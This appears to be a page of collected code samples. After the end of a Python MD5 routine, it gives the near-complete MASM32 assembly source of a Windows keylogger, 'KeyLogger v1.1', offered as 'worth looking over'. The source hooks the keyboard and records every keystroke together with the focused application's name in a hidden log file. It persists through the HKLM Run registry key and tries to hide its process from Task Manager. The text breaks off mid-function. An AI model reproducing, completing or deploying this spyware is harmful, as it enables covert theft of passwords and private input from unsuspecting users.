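    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    data = md5_pad(msg)
    for off in range(0, len(data), 64):        # one hashloop pass per block
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(64):
            if i < 16:                             # round 1, FF
                f, g = (b & c) | (~b & d), i
            elif i < 32:                           # round 2, GG
                f, g = (b & d) | (c & ~d), (5 * i + 1) % 16
            elif i < 48:                           # round 3, HH
                f, g = b ^ c ^ d, (3 * i + 5) % 16
            else:                                  # round 4, II
                f, g = c ^ (b | ~d), (7 * i) % 16
            f = (f + a + x[g] + T[i]) & MASK
            # a = b + ((a + F + x + t) <<< s); the other three variables shift
            a, d, c, b = d, c, b, (b + rotl(f, S[i])) & MASK
        a0, b0, c0, d0 = ((a0 + a) & MASK, (b0 + b) & MASK,
                          (c0 + c) & MASK, (d0 + d) & MASK)
    return a0, b0, c0, d0


def md5_result_words(msg):
    """Phase IV: the xchg/rol/xchg sequence byte-swaps each dword so that
    printing the four words as %08x yields the conventional digest."""
    return tuple(struct.unpack(">I", struct.pack("<I", w))[0]
                 for w in md5_state(msg))


def md5_hex(msg):
    return "".join("%08x" % w for w in md5_result_words(msg))


def matches_hashlib(msg):
    """Cross-check against the standard library implementation."""
    return md5_hex(msg) == hashlib.md5(msg).hexdigest()
```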
  6. KeyLogger v1.1 by J. Daniel Pino

Old stuff... With a keyboard hook; it's interesting, worth looking over.

;************************************************************************************************
;KeyLogger v1.1 by J. Daniel Pino -
;
;Daniel_2ar@hotmail.com
;Daniel_2ar@yahoo.com
;Daniel_2@speedy.com.ar
;Daniel_2@data54.com
;
;I hope you find this stuff useful!
;************************************************************************************************
.386
.MODEL FLAT, STDCALL
OPTION CASEMAP:NONE

;*******************************************************************************************************************
;Includes
;*******************************************************************************************************************
INCLUDE C:\MASM32\INCLUDE\WINDOWS.INC
INCLUDE C:\MASM32\INCLUDE\KERNEL32.INC
INCLUDE C:\MASM32\INCLUDE\USER32.INC
INCLUDE C:\MASM32\INCLUDE\COMCTL32.INC
INCLUDE C:\MASM32\INCLUDE\ADVAPI32.INC
INCLUDE C:\MASM32\INCLUDE\MASM32.INC
INCLUDE C:\KeyLogV1-1_source_code\HKL_DLL\HKL.INC

INCLUDELIB C:\MASM32\LIB\KERNEL32.LIB
INCLUDELIB C:\MASM32\LIB\USER32.LIB
INCLUDELIB C:\MASM32\LIB\COMCTL32.LIB
INCLUDELIB C:\MASM32\LIB\ADVAPI32.LIB
INCLUDELIB C:\MASM32\LIB\MASM32.LIB
INCLUDELIB C:\KeyLogV1-1_source_code\HKL_DLL\HKL.LIB

;*******************************************************************************************************************
; Prototypes
;*******************************************************************************************************************
dlgmain PROTO :DWORD, :DWORD, :DWORD, :DWORD
RunParameters PROTO addr_cmd_params:DWORD
CreateLogFile PROTO
SetFilePath PROTO
WriteDateStamp PROTO
GetDateStamp PROTO addr_buffer:DWORD
WriteAppInfoHeader PROTO appnamelen:DWORD
WriteKeyPressed PROTO virtualkeycode:DWORD
TranslateVirtualKeyCode PROTO virtualkeycode:DWORD, addr_buffer:DWORD
dlgabout PROTO :DWORD, :DWORD, :DWORD, :DWORD
HideProcess PROTO

;*******************************************************************************************************************
; Macros
;*******************************************************************************************************************
;This macro searches for a char in a string. If it finds it, it returns in EAX the address of the char
;in the string; else, it returns NULL in EAX.
;*******************************************************************************************************************
FindCharInStr MACRO char_to_find:REQ, p_string:REQ, len_string:REQ
    LOCAL not_found, return
    CLD
    MOV AL, char_to_find
    MOV ECX, len_string
    PUSH EDI
    MOV EDI, p_string
    REPNE SCASB
    JNZ not_found
    DEC EDI
    MOV EAX, EDI
    POP EDI
    JMP return
not_found:
    POP EDI
    XOR EAX, EAX
return:
ENDM

;*******************************************************************************************************************
.DATA
;*******************************************************************************************************************
classname DB "Daniel", 0
dlgname DB "Daniel", 0
CommandLine LPSTR 0
aboutdlgname DB "ABOUTDLG", 0
err_cap DB "Error", 0
err0 DB "Error while trying to install hook.", 0
err1 DB "Error while trying to uninstall hook.", 0
previnstance_err DB "Only one instance of KeyLog can run at a time.", 0
previnstance_cap DB "KeyLog V1.1", 0
button0_cap0 DB "Activate", 0
button0_cap1 DB "Deactivate", 0

;The following variable stores the address of the path and name of the application
;that is being typed into
addr_app_name DWORD 0

;The following byte array stores the path and name of the application that had the focus
prev_app_name DB 300 DUP (0)

;This variable holds the program state (visible (1) - hidden (0))
hidden_mode DWORD 1

;---------------------------------------
;Log file variables
;---------------------------------------
h_keylogfile DWORD 0
keylogfilepath DB "X:\Klgf.txt", 0
keylogfile_err DB "Unable to create log file. KeyLogger will exit now", 0
keylogfilestamp DB "KeyLog Version 1.1 - Started on: ", 0
keylogfilestok DWORD TRUE
keylogfilebuff DB 200 DUP (0)
arethereparameters DWORD 0
cmd_token DB "-", 0
date DB "MMMM',' dddd dd yyyy", 0
time DB "hh':'mm tt", 0
line_1 DB "**************************************************", 0
line_2 DB "--------------------------------------------------", 0
infoheader_f1 DB "Application: ", 0
infoheader_f2 DB "got focus on: ", 0
infoheader_f3 DB "user type: ", 0
first_app_hooked DWORD TRUE

;---------------------------------------
;Windows' registry variables
;---------------------------------------
h_regkey DWORD 0
subkey DB "Software\Microsoft\Windows\CurrentVersion\run", 0
subkey_descrp DB "KeyLogRegEntry", 0
keylog_params DB "-ah", 0

;-------------------------------------
;Strings for special keys
;-------------------------------------
k_escape DB "[ESC]", 0
k_tab DB "[TAB]", 0
k_f1 DB "[F1]", 0
k_f2 DB "[F2]", 0
k_f3 DB "[F3]", 0
k_f4 DB "[F4]", 0
k_f5 DB "[F5]", 0
k_f6 DB "[F6]", 0
k_f7 DB "[F7]", 0
k_f8 DB "[F8]", 0
k_f9 DB "[F9]", 0
k_f10 DB "[F10]", 0
k_f11 DB "[F11]", 0
k_f12 DB "[F12]", 0
k_printscreen DB "[PRINTSCREEN]", 0
k_scrolllock DB "[SCROLLLOCK]", 0
k_break DB "[BREAK]", 0
k_insert DB "[INSERT]", 0
k_home DB "[HOME]", 0
k_pageup DB "[PAGEUP]", 0
k_delete DB "[DELETE]", 0
k_end DB "[END]", 0
k_pagedown DB "[PAGEDOWN]", 0
k_back DB "[BACK]", 0
k_capslock DB "[CAPSLOCK]", 0
k_numlock DB "[NUMLOCK]", 0
k_shift DB "[SHIFT]", 0
k_control DB "[CONTROL]", 0
k_alt DB "[ALT]", 0
k_left DB "[LEFT]", 0
k_up DB "[UP]", 0
k_right DB "[RIGHT]", 0
k_down DB "[DOWN]", 0
k_numpad0 DB "[NUMPAD 0]", 0
k_numpad1 DB "[NUMPAD 1]", 0
k_numpad2 DB "[NUMPAD 2]", 0
k_numpad3 DB "[NUMPAD 3]", 0
k_numpad4 DB "[NUMPAD 4]", 0
k_numpad5 DB "[NUMPAD 5]", 0
k_numpad6 DB "[NUMPAD 6]", 0
k_numpad7 DB "[NUMPAD 7]", 0
k_numpad8 DB "[NUMPAD 8]", 0
k_numpad9 DB "[NUMPAD 9]", 0
k_unknown DB "[UNKNOWN]", 0

kernel_name DB "KERNEL32.DLL", 0
kernel_function DB "RegisterServiceProcess", 0
buffer DB 100 DUP (0)

;*******************************************************************************************************************
.DATA?
;*******************************************************************************************************************
hInstance DWORD ?
h_Dlg DWORD ?
hButton0 DWORD ?
hButton1 DWORD ?

;***************************************************
;Controls' handle variables
;***************************************************
;Push buttons
;---------------------------------------------------
h_IDC_BUTTON0 DWORD ?
h_IDC_BUTTON1 DWORD ?

;*******************************************************************************************************************
.CONST
;*******************************************************************************************************************
;Push buttons
;---------------------------------------------------
IDC_BUTTON0 EQU 400
IDC_BUTTON1 EQU 401
IDC_BUTTON2 EQU 402
IDC_BUTTON3 EQU 403
IDC_CHECK00 EQU 500

;---------------------------------------------------
;User messages
;---------------------------------------------------
WM_KEYSTROKE EQU WM_USER + 2
WM_KEYLOGMSG EQU WM_USER + 3

;*******************************************************************************************************************
.CODE
;*******************************************************************************************************************
start:
    INVOKE GetModuleHandle, NULL
    MOV hInstance, EAX
    INVOKE GetCommandLine
    INVOKE dlgmain, hInstance, NULL, NULL, SW_SHOWDEFAULT
    INVOKE ExitProcess, 0

;*******************************************************************************************************************
;*******************************************************************************************************************
dlgmain PROC hInst:HINSTANCE, hPrevInst:HINSTANCE, CmdLine:LPSTR, CmdShow:DWORD
    LOCAL wc:WNDCLASSEX, msg:MSG, hDlg:HWND, cmd_params[50]:BYTE

    ;---------------------------------------------------------------------
    ;We check whether an instance of this program is already running
    ;---------------------------------------------------------------------
    INVOKE FindWindow, ADDR classname, NULL
    .IF EAX != NULL
        INVOKE MessageBox, NULL, ADDR previnstance_err, ADDR previnstance_cap, MB_ICONERROR
        INVOKE ExitProcess, NULL
    .ENDIF

    MOV wc.cbSize, SIZEOF WNDCLASSEX
    MOV wc.style, CS_HREDRAW or CS_VREDRAW
    MOV wc.lpfnWndProc, OFFSET dlgproc
    MOV wc.cbClsExtra, NULL
    MOV wc.cbWndExtra, DLGWINDOWEXTRA
    PUSH hInst
    POP wc.hInstance
    MOV wc.hbrBackground, COLOR_BTNFACE+1
    MOV wc.lpszMenuName, NULL
    MOV wc.lpszClassName, OFFSET classname
    INVOKE LoadIcon, hInst, NULL
    MOV wc.hIcon, EAX
    MOV wc.hIconSm, EAX
    INVOKE LoadCursor, NULL, IDC_ARROW
    MOV wc.hCursor, EAX
    INVOKE RegisterClassEx, addr wc
    INVOKE CreateDialogParam, hInstance, ADDR dlgname, NULL, NULL, NULL
    MOV hDlg, EAX
    MOV h_Dlg, EAX
    INVOKE InitCommonControls

    ;The handle of the "Hide" button is obtained
    INVOKE GetDlgItem, h_Dlg, IDC_BUTTON1
    MOV h_IDC_BUTTON1, EAX

    ;We'll try to hide the program from the Windows' task manager
    INVOKE HideProcess

    ;---------------------------------------------------------------------
    ; We check whether the program should be run at Windows' start up
    ;---------------------------------------------------------------------
    ;The registry key is opened to check whether the subkey already exists
    INVOKE RegOpenKeyEx, HKEY_LOCAL_MACHINE, ADDR subkey, NULL, KEY_ALL_ACCESS, ADDR h_regkey
    .IF EAX == ERROR_SUCCESS ;If it is
        ;we look for the subkey
        INVOKE RegQueryValueEx, h_regkey, ADDR subkey_descrp, NULL, NULL, NULL, NULL
        .IF EAX == ERROR_SUCCESS ;If it does exist
            ;The AUTOCHECKBOX button is checked
            INVOKE CheckDlgButton, hDlg, IDC_CHECK00, BST_CHECKED
        .ENDIF
        ;The key is closed
        INVOKE RegCloseKey, h_regkey
    .ENDIF

    ;---------------------------------------------------------------------
    ; We take the application path out of the command line in order
    ; to get the parameters only
    ;---------------------------------------------------------------------
    INVOKE GetCommandLine
    MOV CommandLine, EAX
    INVOKE StripRangeI, CommandLine, ADDR cmd_params, 22h, 22h

    ;Any parameter found in the command line is executed,
    ;and it is decided whether the window is shown or not
    INVOKE RunParameters, ADDR cmd_params
    ;---------------------------------------------------------------------

    .WHILE TRUE
        INVOKE GetMessage, ADDR msg, NULL, 0, 0
        .BREAK .IF (!EAX) ;If EAX = 0
        INVOKE IsDialogMessage, hDlg, ADDR msg
        .IF EAX == FALSE
            INVOKE TranslateMessage, ADDR msg
            INVOKE DispatchMessage, ADDR msg
        .ENDIF
    .ENDW
    MOV EAX, msg.wParam
    RET
dlgmain ENDP

;*******************************************************************************************************************
;This function receives, interprets and acts according to the messages it is
;responsible for.
;*******************************************************************************************************************
dlgproc PROC hDlg:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
    LOCAL temp_buffer:DWORD

    .IF uMsg == WM_DESTROY
        ;The log file is closed
        INVOKE CloseHandle, h_keylogfile
        INVOKE PostQuitMessage, NULL

    .ELSEIF uMsg == WM_COMMAND
        MOV EAX, wParam
        .IF AX == IDC_BUTTON0
            SHR EAX, 16
            .IF AX == BN_CLICKED
                INVOKE GetCurrentState
                .IF EAX == 0
                    INVOKE CreateLogFile
                    .IF EAX != 0
                        INVOKE MessageBox, hDlg, ADDR keylogfile_err, ADDR err_cap, MB_ICONERROR
                        ;The program is terminated
                        INVOKE ExitProcess, NULL
                    .ENDIF
                    INVOKE StartKeyLogHooking, hDlg
                    .IF EAX == -1
                        INVOKE MessageBox, hDlg, ADDR err0, ADDR err_cap, MB_ICONERROR
                    .ELSE
                        ;We save the address of the buffer returned by the function,
                        ;since that is where the name of the application being
                        ;typed into will be stored
                        MOV addr_app_name, EAX
                        ;The button caption is changed from "Activate" to "Deactivate"
                        INVOKE SendDlgItemMessage, hDlg, IDC_BUTTON0, WM_SETTEXT, NULL, ADDR button0_cap1
                    .ENDIF
                    ;The Hide button is enabled
                    INVOKE EnableWindow, h_IDC_BUTTON1, TRUE
                .ELSEIF EAX == 1
                    ;The log file is closed
                    INVOKE CloseHandle, h_keylogfile
                    INVOKE StopKeyLogHooking
                    .IF EAX == -1
                        INVOKE MessageBox, hDlg, ADDR err1, ADDR err_cap, MB_ICONERROR
                    .ELSE
                        INVOKE SendDlgItemMessage, hDlg, IDC_BUTTON0, WM_SETTEXT, NULL, ADDR button0_cap0
                    .ENDIF
                    ;The Hide button is disabled
                    INVOKE EnableWindow, h_IDC_BUTTON1, NULL
                .ENDIF
            .ENDIF

        .ELSEIF AX == IDC_BUTTON1
            INVOKE ShowWindow, hDlg, SW_HIDE
            AND hidden_mode, 0

        .ELSEIF AX == IDC_BUTTON2
            SHR EAX, 16
            .IF AX == BN_CLICKED
                INVOKE DialogBoxParam, hInstance, ADDR aboutdlgname, hDlg, OFFSET dlgabout, NULL
            .ENDIF

        .ELSEIF AX == IDC_CHECK00
            SHR EAX, 16
            .IF AX == BN_CLICKED
                INVOKE IsDlgButtonChecked, hDlg, IDC_CHECK00
                .IF EAX == BST_CHECKED
                    AND temp_buffer, 0
                    ;The path where this program is located is determined
                    INVOKE GlobalAlloc, GPTR, 1000
                    MOV temp_buffer, EAX
                    INVOKE GetCommandLine
                    INVOKE lstrcpy, temp_buffer, EAX
                    INVOKE szCatStr, temp_buffer, ADDR keylog_params
                    ;The registry key is created or opened
                    INVOKE RegCreateKeyEx, HKEY_LOCAL_MACHINE, ADDR subkey, NULL, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, ADDR h_regkey, NULL
                    INVOKE lstrlen, temp_buffer
                    ;We set the subkey values
                    INVOKE RegSetValueEx, h_regkey, ADDR subkey_descrp, NULL, REG_SZ, temp_buffer, EAX
                    ;The memory is deallocated
                    INVOKE GlobalFree, temp_buffer
                    ;The key is closed
                    INVOKE RegCloseKey, h_regkey
                .ELSE
                    ;The key is opened in order to delete the subkey
                    INVOKE RegOpenKeyEx, HKEY_LOCAL_MACHINE, ADDR subkey, NULL, KEY_ALL_ACCESS, ADDR h_regkey
                    .IF EAX == ERROR_SUCCESS ;If the key exists
                        ;The subkey is deleted
                        INVOKE RegDeleteValue, h_regkey, ADDR subkey_descrp
                        ;The key is closed
                        INVOKE RegCloseKey, h_regkey
                    .ENDIF
                .ENDIF
            .ENDIF
        .ENDIF

    .ELSEIF uMsg == WM_KEYLOGMSG
        .IF hidden_mode == 1
            INVOKE ShowWindow, hDlg, SW_HIDE
            AND hidden_mode, 0
        .ELSE
            INVOKE ShowWindow, hDlg, SW_SHOW
            MOV hidden_mode, 1
            ;We put the KeyLog's window on top
            INVOKE SetForegroundWindow, hDlg
        .ENDIF

    .ELSEIF uMsg == WM_KEYSTROKE
        ;Applications' names are compared so that we can determine whether
        ;a new application has the focus
        INVOKE lstrcmp, ADDR prev_app_name, addr_app_name
        .IF EAX != 0
            ;The info header is written for the new application that
            ;got the focus
            INVOKE WriteAppInfoHeader, lParam
            ;The new application's name is stored for subsequent comparisons
            INVOKE lstrcpy, ADDR prev_app_name, addr_app_name
        .ENDIF
        ;The procedure which will write the key pressed into the file is invoked
        INVOKE WriteKeyPressed, wParam

    .ELSE
        INVOKE DefWindowProc, hDlg, uMsg, wParam, lParam
        RET
    .ENDIF
    XOR EAX, EAX
    RET
dlgproc ENDP

;*******************************************************************************************************************
;This procedure examines and executes any parameters passed to the
;program when it was run.
;*******************************************************************************************************************
RunParameters PROC USES EBX addr_cmd_params:DWORD
    ;The command line is examined looking for the parameter token (" -")
    MOV EBX, addr_cmd_params
    MOV AX, WORD PTR [EBX]
    .IF AX != "- " ;If the dash preceding the parameters is not found
        JMP quit
    .ENDIF

    ;------------------------------------------------------------------------------
    ;"Activate" parameter ('a')
    ;------------------------------------------------------------------------------
    ;We look for parameter 'a' (activate)
    FindCharInStr 'a', addr_cmd_params, 49
    .IF EAX != NULL
        INVOKE CreateLogFile
        .IF EAX != 0
            INVOKE MessageBox, h_Dlg, ADDR keylogfile_err, ADDR err_cap, MB_ICONERROR
            ;The program is finished
            INVOKE ExitProcess, NULL
        .ENDIF
        INVOKE StartKeyLogHooking, h_Dlg
        .IF EAX == -1
            INVOKE MessageBox, h_Dlg, ADDR err0, ADDR err_cap, MB_ICONERROR
        .ELSE
            ;We save the address of the buffer returned by the function
            ;since it's there where the application's name onto which the
            ;user is typing will be stored
            MOV addr_app_name, EAX
            ;We change the button caption from "Activate" to "Deactivate"
            INVOKE SendDlgItemMessage, h_Dlg, IDC_BUTTON0, WM_SETTEXT, NULL, ADDR button0_cap1
        .ENDIF
        ;The Hide button is enabled
        INVOKE EnableWindow, h_IDC_BUTTON1, TRUE

        ;------------------------------------------------------------------------------
        ;"Hide" parameter ('h')
        ;------------------------------------------------------------------------------
        ;We look for parameter 'h' (hide)
        FindCharInStr 'h', addr_cmd_params, 49
        .IF EAX != NULL
            RET
        .ENDIF
        ;------------------------------------------------------------------------------
    .ENDIF

quit:
    INVOKE ShowWindow, h_Dlg, SW_SHOWNORMAL
    INVOKE UpdateWindow, h_Dlg
    RET
RunParameters ENDP

;*******************************************************************************************************************
;This function creates the file (or opens the existing one) which will store all the keys
;being pressed, along with any other info of the application that got the focus.
;If it succeeds, it returns NULL; else, it returns -1 (0FFFFFFFFh).
;*******************************************************************************************************************
CreateLogFile PROC
    ;We set the file path
    INVOKE SetFilePath

    ;The log file is created, or the existing one is opened
    INVOKE CreateFile, ADDR keylogfilepath, GENERIC_READ OR GENERIC_WRITE, NULL, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
    .IF EAX == INVALID_HANDLE_VALUE
        MOV EAX, -1
        RET
    .ENDIF

    ;The file's handle is saved
    MOV h_keylogfile, EAX

    ;If the keyboard logging is started, write DateStamp
    .IF keylogfilestok == TRUE
        INVOKE WriteDateStamp
    .ENDIF
    XOR EAX, EAX
    RET
CreateLogFile ENDP

;*******************************************************************************************************************
;This function determines the path of the log file (KlgF.txt) by checking all the drives
;available in the system.
;*******************************************************************************************************************
SetFilePath PROC USES EBX
    LOCAL driver_letter[4]:BYTE

    MOV DWORD PTR [driver_letter], " \:C"
    AND driver_letter[3], 0
    INVOKE GetLogicalDrives
    MOV EBX, EAX
    SHR EBX, 2 ;Skip test for drives A: & B:
    .WHILE EBX > 0
        SHR EBX, 1
        INVOKE GetDriveType, ADDR driver_letter
        .IF EAX == DRIVE_FIXED
            .BREAK
        .ENDIF
        INC driver_letter
    .ENDW
    MOV AL, BYTE PTR [driver_letter]
    MOV BYTE PTR [keylogfilepath], AL
    RET
SetFilePath ENDP

;*******************************************************************************************************************
;This procedure writes the session header every time the program is run.
;*******************************************************************************************************************
WriteDateStamp PROC
    LOCAL bytes_written:DWORD, temp:DWORD

    AND temp, 0
    ;If the program is run for the first time, write DateStamp
    .IF keylogfilestok == TRUE
        ;The file pointer is set to the end of the file in order to avoid
        ;overwriting any other data
        INVOKE SetFilePointer, h_keylogfile, NULL, NULL, FILE_END

        ;We write the Enter key chars (0Dh - 0Ah)
        MOV EBX, OFFSET keylogfilebuff
        MOV WORD PTR [EBX], 0A0Dh
        INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL

        ;An asterisk-line separator is written
        INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL
        INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL

        ;We write the Enter key chars (0Dh - 0Ah)
        MOV EBX, OFFSET keylogfilebuff
        MOV WORD PTR [EBX], 0A0Dh
        INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL

        ;KeyLog header
        INVOKE WriteFile, h_keylogfile, ADDR keylogfilestamp, 33, ADDR bytes_written, NULL
        INVOKE GetDateStamp, ADDR keylogfilebuff
        MOV temp, EAX
        INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, temp, ADDR bytes_written, NULL

        ;We write the Enter key chars (0Dh - 0Ah)
        MOV EBX, OFFSET keylogfilebuff
        MOV WORD PTR [EBX], 0A0Dh
        INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL

        ;An asterisk-line separator is written
        INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL
        INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL

        ;The keylogfilestok variable is reset in order not to write the KeyLog
        ;header again
        AND keylogfilestok, 0
    .ENDIF
    RET
WriteDateStamp ENDP

;*******************************************************************************************************************
;This function stores into the buffer (whose address is received as a parameter) the string
;of the date and time. Returns the length of that string in EAX.
;*******************************************************************************************************************
GetDateStamp PROC addr_buffer:DWORD
    LOCAL cont:DWORD

    ;The local variable cont is reset
    AND cont, 0

    ;--------------
    ; Date
    ;--------------
    INVOKE GetDateFormat, NULL, NULL, NULL, ADDR date, addr_buffer, 200
    ;EAX is decremented by one in order not to include the NULL character of the
    ;string
    DEC EAX
    ADD cont, EAX

    ;A separator (" - ") is written
    ADD addr_buffer, EAX
    MOV EBX, addr_buffer
    MOV BYTE PTR [EBX], ' '
    INC addr_buffer
    INC cont
    MOV WORD PTR [EBX +1], ' -'
    INC cont
    INC cont
    INC addr_buffer
    INC addr_buffer

    ;--------------
    ; Time
    ;--------------
    INVOKE GetTimeFormat, NULL, NULL, NULL, ADDR time, addr_buffer, 200
    ;EAX is decremented by one in order not to include the NULL character of the
    ;string
    DEC EAX
    ADD addr_buffer, EAX
    ADD cont, EAX
    MOV EAX, cont
    RET
GetDateStamp ENDP

;*******************************************************************************************************************
;This procedure writes the info header in the KeyLog file. It's invoked whenever an application
;gets the focus.
;*******************************************************************************************************************
WriteAppInfoHeader PROC appnamelen:DWORD
    LOCAL bytes_written:DWORD, temp:DWORD

    ;The file pointer is set to the end of the file in order to avoid
    ;overwriting any other data
    INVOKE SetFilePointer, h_keylogfile, NULL, NULL, FILE_END

    ;Code for the second line separator
    .IF first_app_hooked == TRUE
        AND first_app_hooked, 0
    .ELSE
        ;We write the Enter key chars (0Dh - 0Ah)
        MOV EBX, OFFSET keylogfilebuff
        MOV WORD PTR [EBX], 0A0Dh
        INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL
        ;A dash line separator is written
        INVOKE WriteFile, h_keylogfile, ADDR line_2, 50, ADDR bytes_written, NULL
        INVOKE WriteFile, h_keylogfile, ADDR line_2, 50, ADDR bytes_written, NULL
    .ENDIF

    ;We write the Enter key chars (0Dh - 0Ah)
    MOV EBX, OFFSET keylogfilebuff
    MOV WORD PTR [EBX], 0A0Dh
    INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL

    ;The info header field 1 is written
    INVOKE WriteFile, h_keylogfile, ADDR infoheader_f1, 13, ADDR bytes_written, NULL
    ;The application path and name is written:
    INVOKE WriteFile, h_keylogfile, addr_app_name, appnamelen, ADDR bytes_written, NULL

    ;We write the Enter key chars (0Dh - 0Ah)
    MOV EBX, OFFSET keylogfilebuff
    MOV WORD PTR [EBX], 0A0Dh
    INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL

    ;The info header field 2 is written
    INVOKE WriteFile, h_keylogfile, ADDR infoheader_f2, 14, ADDR bytes_written, NULL
    INVOKE GetDateStamp, ADDR keylogfilebuff
    MOV temp, EAX
    INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, temp, ADDR bytes_written, NULL

    ;We write the Enter key chars (0Dh - 0Ah)
    MOV EBX, OFFSET keylogfilebuff
    MOV WORD PTR [EBX], 0A0Dh
    INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL

    ;The info header field 3 is written
    INVOKE WriteFile, h_keylogfile, ADDR infoheader_f3, 11, ADDR bytes_written, NULL

    ;We write the Enter key chars (0Dh - 0Ah) twice
    MOV EBX, OFFSET keylogfilebuff
    MOV DWORD PTR [EBX], 0A0D0A0Dh
    INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 4, ADDR bytes_written, NULL
    RET
WriteAppInfoHeader ENDP

;*******************************************************************************************************************
;This procedure writes into the file the keys pressed by the user
;*******************************************************************************************************************
WriteKeyPressed PROC virtualkeycode:DWORD
    LOCAL bytes_written:DWORD, len_string:DWORD

    INVOKE TranslateVirtualKeyCode, virtualkeycode, ADDR keylogfilebuff
    MOV len_string, EAX

    ;The file pointer is set to the end of the file in order to avoid
    ;overwriting any other data
    INVOKE SetFilePointer, h_keylogfile, NULL, NULL, FILE_END

    ;The character typed by the user is written
    INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, len_string, ADDR bytes_written, NULL
    RET
WriteKeyPressed ENDP

;*******************************************************************************************************************
;This function translates the virtual code of a key being pressed into its name. The result is
;saved into a buffer whose address is received as a parameter. Returns the length of
;the key's name.
;*******************************************************************************************************************
TranslateVirtualKeyCode PROC virtualkeycode:DWORD, addr_buffer:DWORD
    LOCAL len_string:DWORD

    ;Local variables are reset
    AND len_string, 0
    MOV EAX, virtualkeycode

    ;If the virtual code of the key is between "A" (41h) and "Z" (5Ah)
    .IF EAX >= 41h && EAX <= 5Ah
        ;We check whether the Caps Lock key is activated
        INVOKE GetKeyState, VK_CAPITAL
        .IF EAX == NULL
            ADD virtualkeycode, 20h
        .ENDIF
        MOV EAX, virtualkeycode
        MOV EBX, addr_buffer
        MOV BYTE PTR [EBX], AL
        ;The string of the key's name is 1 byte in length
        MOV len_string, 1
    .ELSEIF EAX == VK_ESCAPE
        INVOKE lstrcpy, addr_buffer, ADDR k_escape
        MOV len_string, 5
    .ELSEIF EAX == VK_TAB
        INVOKE lstrcpy, addr_buffer, ADDR k_tab
        MOV len_string, 5
    .ELSEIF EAX == VK_F1
        INVOKE lstrcpy, addr_buffer, ADDR k_f1
        MOV len_string, 4
    .ELSEIF EAX == VK_F2
        INVOKE lstrcpy, addr_buffer, ADDR k_f2
        MOV len_string, 4
    .ELSEIF EAX == VK_F3
        INVOKE lstrcpy, addr_buffer, ADDR k_f3
        MOV len_string, 4
    .ELSEIF EAX == VK_F4
        INVOKE lstrcpy, addr_buffer, ADDR k_f4
        MOV len_string, 4
    .ELSEIF EAX == VK_F5
        INVOKE lstrcpy, addr_buffer, ADDR k_f5
        MOV len_string, 4
    .ELSEIF EAX == VK_F6
        INVOKE lstrcpy, addr_buffer, ADDR k_f6
        MOV len_string, 4
    .ELSEIF EAX == VK_F7
        INVOKE lstrcpy, addr_buffer, ADDR k_f7
        MOV len_string, 4
    .ELSEIF EAX == VK_F8
        INVOKE lstrcpy, addr_buffer, ADDR k_f8
        MOV len_string, 4
    .ELSEIF EAX == VK_F9
        INVOKE lstrcpy, addr_buffer, ADDR k_f9
        MOV len_string, 4
    .ELSEIF EAX == VK_F10
        INVOKE lstrcpy, addr_buffer, ADDR k_f10
        MOV len_string, 5
    .ELSEIF EAX == VK_F11
        INVOKE lstrcpy, addr_buffer, ADDR k_f11
        MOV len_string, 5
    .ELSEIF EAX == VK_F12
        INVOKE lstrcpy, addr_buffer, ADDR k_f12
        MOV len_string, 5
    .ELSEIF EAX == VK_SNAPSHOT
        INVOKE lstrcpy, addr_buffer, ADDR k_printscreen
        MOV len_string, 13
    .ELSEIF EAX == VK_SCROLL
        INVOKE lstrcpy, addr_buffer, ADDR k_scrolllock
        MOV len_string, 12
    ;(13h) Virtual-key code for the Break key
    .ELSEIF EAX == 13h
        INVOKE lstrcpy, addr_buffer, ADDR k_break
        MOV len_string, 7
    .ELSEIF EAX == VK_INSERT
        INVOKE lstrcpy, addr_buffer, ADDR k_insert
        MOV len_string, 8
    .ELSEIF EAX == VK_HOME
        INVOKE lstrcpy, addr_buffer, ADDR k_home
        MOV len_string, 6
    .ELSEIF EAX == VK_PGUP
        INVOKE lstrcpy, addr_buffer, ADDR k_pageup
        MOV len_string, 8
    .ELSEIF EAX == VK_DELETE
        INVOKE lstrcpy, addr_buffer, ADDR k_delete
        MOV len_string, 8
    .ELSEIF EAX == VK_END
        INVOKE lstrcpy, addr_buffer, ADDR k_end
        MOV len_string, 5
    .ELSEIF EAX == VK_PGDN
        INVOKE lstrcpy, addr_buffer, ADDR k_pagedown
        MOV len_string, 10
    .ELSEIF EAX == VK_SPACE
        MOV EBX, addr_buffer
        MOV BYTE PTR [EBX], 20h
        ;The string of the key's name is 1 byte in length
        MOV len_string, 1
    .ELSEIF EAX == VK_BACK
        INVOKE lstrcpy, addr_buffer, ADDR k_back
        MOV len_string, 6
    .ELSEIF EAX == VK_CAPITAL
        INVOKE lstrcpy, addr_buffer, ADDR k_capslock
        MOV len_string, 10
    .ELSEIF EAX == VK_NUMLOCK
        INVOKE lstrcpy, addr_buffer, ADDR k_numlock
        MOV len_string, 9
    ;(10h) Virtual-key code for the Shift key
    .ELSEIF EAX == 10h
        INVOKE lstrcpy, addr_buffer, ADDR k_shift
        MOV len_string, 7
    ;(11h) Virtual-key code for the Control key
    .ELSEIF EAX == 11h
